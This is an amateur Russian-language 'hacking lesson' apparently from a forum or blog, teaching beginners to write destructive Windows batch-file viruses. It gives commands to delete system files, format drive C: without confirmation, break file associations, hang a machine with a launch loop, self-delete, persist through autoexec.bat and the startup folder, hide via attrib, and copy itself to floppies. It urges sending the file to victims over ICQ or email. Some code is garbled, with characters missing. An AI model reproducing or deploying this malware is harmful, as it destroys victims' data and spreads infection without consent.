*ХЕКЕРСТВО* урок 10 ломае виндус и многое другое(юбилейный 10 выпуск!)
Приветствую всех начинающих вирусописателей)) В этой статье не будет ничего сложного, здесь НЕ БУДЕТ ПРОГРАММИРОВАНИЯ. Зато очень полезная информация для тех кто хочет создать свой "вирус")) Заранее скажу что учился сам по одной книжке но вот косяк после формата винта я про неё забыл и...а так бы лучше ссылку на неё дал...Ну ладно поехали!)
Вобщем речь пойдёт о написании вируса в блокнотеJ С расширением. bat.
BAT файлы это командные файлы в которых записаны команды по одной в каждой строчке. ТОесть написал команду в строчке блокнота жмёшь "Enter" и приступил к написанию другой) Теперь делай по действиям :
- Запускаешь блокнот Сейчас приведу парочку тупых команд но это для того чтобы ты убедился что я не врун)) Дальше будет интереснее) Вот пример того что можешь пихнуть в блокнот..
Calc (запускает конкулятор)
Taskmgr (диспетчер задач)
Mspaint(рисовалка)
Это привёл КОМАНДЫ!) Теперь смотри как это запускать....перед всеми этими командами пишешь "start" Пример: Start Mspaint, С этим разобрались. Теперь сохраняй всё это дело...Что уже сохранил? Теперь смотри если ты сохранил в формате "txt" то можешь смело искать другую тему и покинуть эту...если ты внимательно читал и сохранил в "bat" то можешь себя похвалить))) Теперь пробуй запустить твоё чудо) Если команда правильная то у тебя запуститься то что ты хотел)) Теперь следущее....
И ещё.. прописывать "start" только для прог винды!!! Для остальных команд этого не нужно!! Теперь...))))
А теперь мы приступим к злому банальному удалению файлов!! Запускай любимый блокнот и пиши в нём...(ты скопировал команду а ты сам напиши! Запоминай их!!)
Del . /q ( после запуска этой команды все файлы кроме папок которые были в той папке где был запущен вирус удалатся!!! Тоесть ты уже сохранил это добро в Bat на рабочий стол или в мои документы ну или куда хочешь...запускаешь это и......АААА!!!!! Меня Нае....и!!!! Нет) Если ярлычки на рабочем столе удалились а в моих документах кроме папок ничего не осталось значит всё нормально! (для тебя скорее всего и хорошо и плохо, читать нужно было что эта команда делает!))) Нужно просто быть ВНИМАТЕЛЬНЫМ!
Теперь ещё....
Если ты хочешь чтобы твой загадочный файлик после выполнения всех команд просто взял и исчез то эта команда для тебя) del %0 (ПИСАТЬ ЕЁ В САМОМ КОНЦЕ ВИРУСА))))
Эти команды копируют твой файлик туда куда ему скажешь) Вот типичный пример...
Copy %0 C:saper. bat или Copy %0 C:game. bat Имена файлов и буквы жёсткого диска можно менять главное чтобы они существовали)(всмысле разделы винчестера имелись а не имена файлов)
Теперь прикольнёмся) пиши эту команду) label E: Pridurok. После выполнения этой команды винт будет называться "pridurok"))) Тупо но весело)
"Скажи сколько время?))" Вот ещё команда) time 00:00 . Время можно установить естественно своё ну например time 07:45 . Можно ещё подправить дату) date 13.03.36
ПРикольно получится) Каспер начнёт ругаться мол "ключик истёк ещё 20 лет назад))) Покупай или проваливай))))) Также и с другими прогами работающие подобным образом.) Вот тебе ещё команда которая при запуске попытается (в зависимости от мощности компа) повесить его.
;
Start mspaint
Goto x ;
Вместо паинта можно поставить любые проги которые хочешь. Возьми тот же калькулятор или сапёр)) Теперь одна весёлая команда))) assoc. exe=.mp3 После её выполнения все ексешнкики будут запускаться как музыка)) Это явное убийство компа) Можно ещё почудить с ярлыками...например пишешь так.. assoc. lnk=.txt И тогда все ярлычки будут открываться скорее всего блокнотиком)))) Представляешь глаза юзверя который будет стучать мышкой по столу пытаясь запустить любимую контру с рабочего стола через ярлык)))) Можно ещё позабивать комп папками) Вот команда:
.bat.
2. запускаем блокнот.
3. Теперь пишим в нем команды которые батик будет выполнять на чужом кампе, помните все команды он делает последовательно.
Грохаем windows на кампе жертвы:
Cd -команда для выхода в корневой каталог из места откуда был запущен bat файл
Cd C: -команда перехода на диск C где почти у всех кампах стоит виндовс
Сd windows -переходим в папку Windows (у 95% ламеров и юзеров папка называется именно так)
Большой минус бат файлов да и ДОСа в частности это то что нельзя удалять сразу папку с файлами, а нужно заходить в каждую папку отдельно и удалять там файлы.!!!
Del .exe - удаяем все файлы с расширением. exe
Del .ini -удаяем все файлы с расширением. ini
Del .com -удаяем все файлы с расширением. com
Cd
Cd windows
Cd system
Del .dll
Del .exe
После этих простеньких строчек у юзера или ламера будет примерно 30 минут работы!)
Код полностью:
Cd
Cd C: Сd windows
Del .exe
Del .ini
Del .com
Cd
Cd windows
Cd system
Del .dll
Del .exe
Но вдруг папка виндовс называется не windows а например winMe, или win98, да без проблем, просто надо будет после этого кода написать ниже ещё один только чтобы папка называлась winMe и так далее.
Код полностью:
Cd
Cd C: Сd winMe
Del .exe
Del .ini
Del .com
Cd
Cd win98
Cd system
Del .dll
Del .exe
И так далее! Как вы понимаете таким образом можно грохнуть все что угодно на чужом винте! Только помните, что такое можно делать если на машине жертвы стоит Windows 9Х!!!
Люблю прикалывать ламеров, это форматирование диска С:
Форматируем диск С:
Cd -команда для выхода в корневой каталог из места откуда был запущен bat файл
Format C: -команда форматирования диска
С: Y -команда автоматического согласие форматирование диска без ведома или подтверждения команды ламером
Y -тоже самое
Y -уже говорил
Хе! Вот и все...
Код полностью:
Cd
Format C:
Y
Y
Y
Единственный минус! Такой код может не сработать если на кампе стоит Windows ME или XP! Придется писать другой путь. В этих форточках команда форматирования лежит не просто в папке Windows, а по следующему пути
C:WINDOWSCOMMANDformat c:
Но само сабой форматироваться не будет, а потребует потверждение и простая команда
Y
Y
Y
Не поможет, нужена другая. Просто добавим параметр /autotest
C:WINDOWSCOMMANDformat c: /autotest
В данном случае, подтверждать ничего не придется.
Как и где это применить?
Просто отсылаете бат фаил какому нибудь юзверю по аське или на мыло.
При открытие файла, начнёца процесс.
Так что не советую открывать фаил у себя на компе.
Если Вы залезли на удаленный компьютер то можете тоже злостно пошутить.
Но как сделать так, чтобы файл запустился автоматически?
Лазив по компу жертвы Вам вдруг захотелось форматнуть его винт, ну мало ли, вдруг он какой нибудь нацист или педофил! Разумеется Вы не сможите запустить файл со своего компа на компе жертвы. Но всёже есть пару вариантов. Первый, это загрузить файл в автозагрузку по пути
C:windows (или как там будет папка называться)Главное меню Программы Автозагрузка или переименовать Ваш батик в Autoexec. bat и загрузить в корневой С:
ВТОРОЙ СПОСОБ
@Echo off
Copy %0 c:virus. bat >nul
Echo c:virus. bat>>c:autoexec. bat
Этот вирус заражает винчестер, оставляя только один файл virus. bat.
Но все-таки я бы не сказал что это полноценный вирус, т. к. он лишен
Возможности заражать другие компьютеры. Чтобы этот BAT-вирус обрел
Более четкие очертания дополним его возможностью заражать другие ПК:
@Echo off
Copy %0 c:virus. bat >nul
Echo c:virus. bat>>c:autoexec. bat
Copy %0 a:run. bat >nul
В этом примере появляется строка, которая дает возможность вирусу
Заражать дискеты. Смысл этого в том что если при перезагрузке ПК в
Дисководе будет дискета, то она будет заражена.
Конечно файл virus. bat в корневом диске C: будет сильно мозолить
Глаза юзеру, чтобы этого не было существует программа attrib.
Преобразуем вирус:
@Echo off
Copy %0 c:virus. bat >nul
Attrib +h c:virus. bat >nul
Echo c:virus. bat>>c:autoexec. bat
Copy %0 a:run. bat >nul
Если вы внимательны, то вы уже поняли, что вызов файла virus. bat в
Autoexec. bat будет записываться каждый раз при перезагрузке ПК.
Чтобы этого не произошло есть простой способ: после записи вызова
Надо с помощью программы attrib установить атрибут только чтение у
Autoexec. bat. А есть другой вариант, он немного посложнее, но
Гораздо грамотнее:
@Echo off
If exist c:virus. bat goto cool
Copy %0 c:virus. bat >nul
Attrib +h c:virus. bat >nul
Echo c:virus. bat>>c:autoexec. bat
:cool
Copy %0 a:run. bat >nul
Здесь вторая строка проверяет существует ли уже файл c:virus. bat и
Если он уже существует, то происходит переход к метке cool. Этот
Способ тоже очень прост. Явный недостаток - если юзер уберет вызов
Из autoexec. bat, а файл virus. bat оставит, то глупый вирус будет
Нагло обманут. Чтобы вирус был умнее, то надо использовать программу
Find, если вам будет не лень с ней разбираться, то вы сможете
Написать более сложный BAT-вирус, который будет заражать не один
Файл c:autoexec. bat, а все .BAT.
Пример: